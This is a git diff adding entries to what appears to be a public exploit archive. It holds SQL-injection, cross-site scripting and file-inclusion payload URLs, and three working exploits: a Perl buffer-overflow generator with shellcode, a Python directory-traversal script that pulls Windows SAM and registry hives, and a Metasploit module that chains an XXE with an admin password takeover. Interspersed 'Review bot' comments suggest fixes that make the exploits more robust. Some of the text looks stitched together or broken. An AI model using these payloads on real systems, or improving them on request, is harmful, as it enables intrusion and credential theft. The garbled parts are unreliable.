diff --git a/files.csv b/files.csv
index 765b7593f..fb9675508 100755
--- a/files.csv
+++ b/files.csv
@@ -30107,3 +30107,19 @@ id,file,description,date,author,platform,type,port
33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0
33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
+33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0
+33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 'arbre.php' Cross Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0
+33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
+33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
+33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002
+33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
+33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80
+33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 'proxy.php' Cross Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0
+33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0
+33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 'MSP' Script Cross Site Scripting Vulnerability",2009-12-23,"Floyd Fuh",multiple,webapps,0
+33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 'myps.php' Cross Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
+33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
diff --git a/platforms/hardware/remote/33423.txt b/platforms/hardware/remote/33423.txt
new file mode 100755
index 000000000..ea8bb96c3
--- /dev/null
+++ b/platforms/hardware/remote/33423.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37432/info
+
+The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities.
+
+Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
+
+The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33438.txt b/platforms/multiple/webapps/33438.txt
new file mode 100755
index 000000000..87e4e2c4e
--- /dev/null
+++ b/platforms/multiple/webapps/33438.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37451/info
+
+webMathematica is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/webMathematica/MSP\
diff --git a/platforms/php/webapps/33421.txt b/platforms/php/webapps/33421.txt
new file mode 100755
index 000000000..2494d5fb1
--- /dev/null
+++ b/platforms/php/webapps/33421.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37417/info
+
+Ampache is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Ampache 3.4.3 is vulnerable; other versions may also be affected.
+
+The following data is available:
+
+username : x' or ' 1=1
+password : x' or ' 1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33422.txt b/platforms/php/webapps/33422.txt
new file mode 100755
index 000000000..6cd82d4fc
--- /dev/null
+++ b/platforms/php/webapps/33422.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37423/info
+
+JBC Explorer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JBC Explorer 7.20 is vulnerable; other versions may also be affected.
+
+http://www.example.com/album/dirsys/arbre.php?0=search&last=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33424.txt b/platforms/php/webapps/33424.txt
new file mode 100755
index 000000000..2e3a7382b
--- /dev/null
+++ b/platforms/php/webapps/33424.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37435/info
+
+Kasseler CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+Kasseler CMS 1.3.4 Lite is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?module=[target]&do=View&id=">
+
+http://www.example.com/index.php?module=[target]&do=">
+
+http://www.example.com/index.php?module=Account&do=UserInfo&uname=">
diff --git a/platforms/php/webapps/33435.txt b/platforms/php/webapps/33435.txt
new file mode 100755
index 000000000..b49257936
--- /dev/null
+++ b/platforms/php/webapps/33435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37446/info
+
+ClarkConnect Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+ClarkConnect Linux 5.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com:82/public/proxy.php?url=
\ No newline at end of file
diff --git a/platforms/php/webapps/33436.txt b/platforms/php/webapps/33436.txt
new file mode 100755
index 000000000..a8be96230
--- /dev/null
+++ b/platforms/php/webapps/33436.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33437.txt b/platforms/php/webapps/33437.txt
new file mode 100755
index 000000000..76eaea02a
--- /dev/null
+++ b/platforms/php/webapps/33437.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37450/info
+
+PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
+
+PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
+http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/33439.txt b/platforms/php/webapps/33439.txt
new file mode 100755
index 000000000..12e6130f4
--- /dev/null
+++ b/platforms/php/webapps/33439.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37464/info
+
+MyBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MyBB 1.4.10 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/myps.php?action=donate&username="/>
+
+http://www.example.com/myps.php?action=donate&username=">
\ No newline at end of file
diff --git a/platforms/php/webapps/33440.txt b/platforms/php/webapps/33440.txt
new file mode 100755
index 000000000..be6e0b252
--- /dev/null
+++ b/platforms/php/webapps/33440.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37473/info
+
+The iF Portfolio Nexus ('com_if_nexus') component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+The following example URI is available:
+
+http://www.example.com/[Yol]/index.php?option=com_kif_nexus&controller=[-LFI-]
+
+
diff --git a/platforms/windows/local/33426.pl b/platforms/windows/local/33426.pl
new file mode 100755
index 000000000..bc3a1dc39
--- /dev/null
+++ b/platforms/windows/local/33426.pl
@@ -0,0 +1,89 @@
+#!/usr/bin/perl
+
+######################################################################################################
+# Exploit Title: CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
+# Discovery date: 11-26-2013
+# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
+# Vulnerable Software/Version: CyberLink Power2Go 9 Essential 9.0.1002.0
+# Vendor Site: http://www.cyberlink.com/
+# Tested On: Windows XP SP3
+# Timeline:
+# -- 11/28/13: Initial contact to vendor requesting appropriate POC to provide vuln details
+# -- 12/03/13: Received appropriate submission POC, initial vuln details provided to vendor
+# -- 12/11/13: Vendor response indicating issue has been escalated to Development team
+# -- 12/17/13: Vendor response indicating RD team working on fix
+# -- 03/05/14: Requested status from vendor who indicated issue has been re-escalated to Development
+# -- 03/07/13: Vendor response indicating someone from Development would contact for more details
+# -- 03/07/14: Vendor response indicating product team working on fix, new release scheduled 3/28
+# -- 03/16/14: Additional details provided to vendor as requested
+# -- 04/06/14: Status update requested from vendor
+# -- 04/08/14: New build released, provided for testing; confirmed fix for this issue
+# Details:
+# -- Power2Go uses registry keys to set various attributes including the registered username
+# -- The registered username is loaded into memory for display when the "About" screen is opened
+# -- These registry values can be found here: HKEY_LOCAL_MACHINE\SOFTWARE\CyberLink\Power2Go9\9.0
+# -- It loads these values into memory without proper bounds checks which enables the exploit
+# To Exploit:
+# -- 1) Run created .reg file 2) Open Power2Go 3) Click on Power2Go Logo in the upper left corner
+# -- Once the registry has been modified, this exploit will be persistent and execute every time
+# -- the application is run and the "About" screen is opened
+######################################################################################################
+
+my $buffsize = 50000; # sets buffer size for consistent sized payload
+
+# construct the required start and end of the reg file
+my $regfilestart ="Windows Registry Editor Version 5.00\n\n";
+$regfilestart = $regfilestart . "[HKEY_LOCAL_MACHINE\\SOFTWARE\\CyberLink\\Power2Go9\\9.0]\n";
+$regfilestart = $regfilestart . "\"UserName\"="; # The UserName field is vulnerable
+
+my $junk = "T_v3rn1x" . ("\x41" x 4892); # offset to next seh
+my $nseh = "\x61\x62"; # overwrite next seh with popad + nop
+my $seh = "\xd0\x50"; # overwrite seh with unicode friendly pop pop ret
+
+# unicode venetian alignment
+my $venalign = "\x6e";
+$venalign = $venalign . "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (200 bytes)
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x2d\x12\x11"; # sub eax,0x11001200
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\x50"; # push eax
+$venalign = $venalign . "\x6e"; # venetian pad/align
+$venalign = $venalign . "\xc3"; # ret
+
+my $nops = "\x71" x 236; # some unicode friendly filler before the shellcode
+
+# Calc.exe payload
+# msfpayload windows/exec CMD=calc.exe R
+# alpha2 unicode/uppercase
+my $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA".
+"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
+"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
+"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
+"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
+"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
+"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
+"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
+"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
+"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
+"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
+"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
+"QQ2LRCM0LJA";
+
+my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffer
+my $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junk
+my $buffer = $sploit.$fill; # assemble the final buffer
+
+my $regfile = $regfilestart . "hex: " . $buffer . $regfileend; # construct the reg file with hex payload to generate binary registry entry
+my $regfile = $regfilestart . "\"". $buffer . "\"";
+
+# write the exploit buffer to file
+my $file = "cyberlinkp2g9_bof.reg";
+open(FILE, ">$file");
+print FILE $regfile;
+close(FILE);
+print "Exploit file [" . $file . "] created\n";
+print "Buffer size: " . length($buffer) . "\n";
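Review bot: `my $regfile = $regfilestart . "hex: " . $buffer . $regfileend;` is dead code: `$regfileend` is never declared anywhere in the script, and the value is discarded on the very next line, which also re-declares `$regfile` with a second `my` (a "masks earlier declaration" warning under `use warnings`, and an undeclared-variable compile error under `use strict`). Delete the `hex:` line so the remaining `my $regfile = $regfilestart . "\"". $buffer . "\"";` is the only declaration, and add `use strict; use warnings;` after the shebang, which would have flagged both problems. `open(FILE, ">$file");` silently continues on failure and then prints "created"; `open(FILE, ">$file") or die "Cannot write $file: $!";` reports the real cause. In the header timeline, the entry dated `03/07/13` sits between two 2014 entries and is presumably a typo for `03/07/14`.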
diff --git a/platforms/windows/remote/33431.html b/platforms/windows/remote/33431.html
new file mode 100755
index 000000000..2a6c47b0a
--- /dev/null
+++ b/platforms/windows/remote/33431.html
@@ -0,0 +1,55 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/33432.html b/platforms/windows/remote/33432.html
new file mode 100755
index 000000000..36332085b
--- /dev/null
+++ b/platforms/windows/remote/33432.html
@@ -0,0 +1,56 @@
+
+
+
+
+
+
diff --git a/platforms/windows/remote/33433.html b/platforms/windows/remote/33433.html
new file mode 100755
index 000000000..d9b986dbf
--- /dev/null
+++ b/platforms/windows/remote/33433.html
@@ -0,0 +1,54 @@
+
+
+
+
diff --git a/platforms/windows/webapps/33428.py b/platforms/windows/webapps/33428.py
new file mode 100755
index 000000000..565daa628
--- /dev/null
+++ b/platforms/windows/webapps/33428.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python
+#
+# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal
+# Date: 04/28/2014
+# Exploit Author: Matt Schmidt (Syph0n)
+# Vendor Homepage: http://www.safenet-inc.com/
+# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
+# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
+# Tested on: Windows 7 and Windows XP SP2
+# CVE: CVE-2007-6483
+# Dork: intitle:"Sentinel Keys License Monitor"
+# Greets to norsec0de
+
+import sys, urllib2, argparse
+
+print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
+print '[+] Written by Matt Schmidt (Syph0n)'
+print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
+print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
+
+
+# Define Help Menu
+if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
+ print 'Usage:'
+ print './exploit.py --host [options]'
+ print ' : The victim host\n'
+ print ' Options:'
+ print ' --port The port the application is listening on (default: 7002)'
+ print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
+ sys.exit(1)
+
+# Parse Arguments
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', required = True)
+parser.add_argument('--port', type = int, default = 7002)
+parser.add_argument('--file')
+args = parser.parse_args()
+
+# Define Variables
+host = args.host
+port = args.port
+if args.file is not None :
+ targetFile = [args.file]
+else:
+ targetFile = ['windows/repair/default', 'windows/repair/sam', 'windows/repair/system', 'windows/repair/software', 'windows/repair/security', 'boot.ini', 'windows/win.ini']
+
+# Send Exploit
+print '[+] Sending exploit!'
+
+# Loop for multiple files
+for path in targetFile:
+ # Define Directory Traversal path
+ url = "http://" + host + ":" + str(port) + "/../../../../../../../../../../../../../../" + str(path)
+
+ # Retrieve file(s)
+ exploit = urllib2.urlopen(url)
+ header = exploit.info()
+ size = int(header.getheaders("Content-Length")[0])
+ print "\n[+] Downloading: C:\%s ! Bytes: %s" % (path, size)
+ filename = url.rsplit('/',1)
+ with open(str(filename[1]), "wb") as contents:
+ contents.write(exploit.read())
+print '\n[+] Done!\n'
\ No newline at end of file
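Review bot: `size = int(header.getheaders("Content-Length")[0])` raises IndexError on any response that carries no Content-Length header, which aborts the loop before the remaining paths are tried; `size = header.getheader("Content-Length", "unknown")` reads it with a default and is enough here since the value is only printed. The hand-rolled help block above `parser = argparse.ArgumentParser()` duplicates what argparse already provides for `-h`/`--help` and for `--host` being required, and its usage line `./exploit.py --host [options]` omits the host value itself; passing `help=` strings to the three `add_argument` calls keeps the option text in one place. The comment `# Define Help Menu` would then be unnecessary, and `if args.file is not None :` should lose the space before the colon.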
diff --git a/platforms/windows/webapps/33434.rb b/platforms/windows/webapps/33434.rb
new file mode 100755
index 000000000..8627d810c
--- /dev/null
+++ b/platforms/windows/webapps/33434.rb
@@ -0,0 +1,298 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Release Control Authenticated XXE',
+ 'Description' => %q{
+ This module take advantage of three separate vulnerabilities in order to
+ read an arbitrary text file from the file system with the privileges
+ of the web server. You must be authenticated, but can be unprivileged
+ since a privilege escalation vulnerability is used. Tested against
+ HP Release Control 9.20.0000, Build 395 installed with demo data.
+
+ The first vulnerability allows an unprivileged authenticated user to list
+ the current users, their IDs, and even their password hashes. Can't login
+ with hashes, but the ID is useful in the second vulnerability.
+
+ When a user changes their password, they post the ID of the user who
+ is going to have their password changed. Just replace it with the
+ admin ID and you change the admin password. You are now admin.
+
+ The third vulnerability is an XXE in the dashboard XML import mechanism.
+ This is what allows you to read the file from the file system.
+
+ This module is super ghetto half because it was an AMF application,
+ half because I worked on it longer than I wanted to.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brandon Perry '
+ ],
+ 'References' =>
+ [
+ ],
+ 'DisclosureDate' => 'May 16 2014'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "Base directory path", '/']),
+ OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
+ ], self.class)
+ end
+
+ def check
+ end
+
+ def run
+ print_status("Authenticating")
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ post = {
+ 'j_username' => datastore['USERNAME'],
+ 'j_password' => datastore['PASSWORD'],
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res and res.headers['Location'] !~ /index.jsp/
+ fail_with("Authentication failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ #not sure why this always fails the first time. Whatever.
+ id = nil
+ while id == nil
+ id = get_admin_id(cookie)
+ end
+
+ print_status("Found admin id: " + id)
+ print_status("Changing admin's password...")
+
+ password = change_admin_password(cookie, id)
+ print_status("Changed admin password to: " + password)
+
+ post = {
+ 'j_username' => 'admin',
+ 'j_password' => password,
+ 'buttonName' => ''
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path)
+ })
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ if res.headers['Location'] !~ /index.jsp/
+ fail_with("Login failed")
+ end
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
+ 'cookie' => cookie
+ })
+
+ cookie = cookie + res.get_cookies
+
+ post = {
+ 'com.mercury.dashboard.screen_resolution_width' => 2560,
+ 'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300,
+ 'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481
+ }
+
+ #need to send this so that the next request doesn't fail
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'),
+ 'method' => 'POST',
+ 'vars_post' => post,
+ 'cookie' => cookie
+ })
+
+ print_status("Exploiting XXE...")
+
+ data = Rex::Text::decode_base64("-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name="com.mercury.dashboard.arch.fieldtree.formForFieldtree."

Y
-----------------------------14627076671482452060466499926
Content-Disposition: form-data; name=".importFromFile"; filename="Dashboard_Objects_Export_20140514.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<ExportList xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><version>2</version><Module><name>Release Control Default Module</name><uuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffc</uuid><description>&xxe;</description><enabled>true</enabled><allowSelfService>false</allowSelfService><copiable>true</copiable><allUsersAccess>true</allUsersAccess><page><pageSequence>0</pageSequence><title>Trends</title><portlet><title>Latent Changes Over Time</title><portletDefinitionUuid>3b7bb6aa02977f5c:6940210b:1163bcb394a:-7fdf</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294918][Latent]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>2</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Abnormal Changes Over Time</title><portletDefinitionUuid>329c812c51783e9e:6a9520f3:11639817da2:-7feb</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294912][Any]</value></value></preferenceValue><preferenceValue><name>Group 
By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>1</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Changes Over Time</title><portletDefinitionUuid>329c812c51783e9e:6a9520f3:11639817da2:-7fec</portletDefinitionUuid><preferenceValue><name>portletEdited</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Filter</name><value><sequence>0</sequence><value>[294912][Any]</value></value></preferenceValue><preferenceValue><name>Group By</name><value><sequence>0</sequence><value>[week][Week]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><autoRefresh>false</autoRefresh><refreshInterval>0</refreshInterval></page><page><pageSequence>1</pageSequence><title>Analysis</title><portlet><title>Application Severity Distribution</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-8000</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Request Status</name><value><sequence>0</sequence><value>[PENDING_APPROVAL][Pending
							Approval]</value></value></preferenceValue><preferenceValue><name>User Applications</name><value><sequence>0</sequence><value>[Y][Yes]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>0</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Change Request Impact Analysis Ratio</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-7ffe</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>Request Status</name><value><sequence>0</sequence><value>[PENDING_APPROVAL][Pending
							Approval]</value></value></preferenceValue><preferenceValue><name>com.mercury.dashboard.app.portal.isWidePortlet</name><value><sequence>0</sequence><value>true</value></value></preferenceValue><layoutColumn>0</layoutColumn><layoutRow>2</layoutRow><layoutWidth>2</layoutWidth><isMinimized>false</isMinimized><isPortletComm>false</isPortletComm></portlet><portlet><title>Application Status Distribution</title><portletDefinitionUuid>586dc58af49e2f4e:ff9805:10a60813037:-7fff</portletDefinitionUuid><preferenceValue><name>displayPrefSummary</name><value><sequence>0</sequence><value>Y</value></value></preferenceValue><preferenceValue><name>User Applications</name><value><sequence>0</sequence><value>[Y][Yes]</value></value></preferenceValue><preferenceValue><name>Time Frame</name><value><sequence>0</sequence><value>[Last Month][Last 